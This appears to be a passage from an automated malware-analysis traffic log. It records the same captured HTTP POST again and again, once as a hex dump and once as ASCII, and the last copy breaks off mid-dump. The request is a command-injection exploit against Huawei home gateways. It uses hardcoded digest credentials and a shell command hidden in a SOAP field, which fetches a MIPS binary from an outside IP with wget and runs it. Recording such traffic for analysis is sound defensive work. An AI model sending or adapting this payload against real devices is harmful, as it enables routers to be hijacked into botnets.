    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 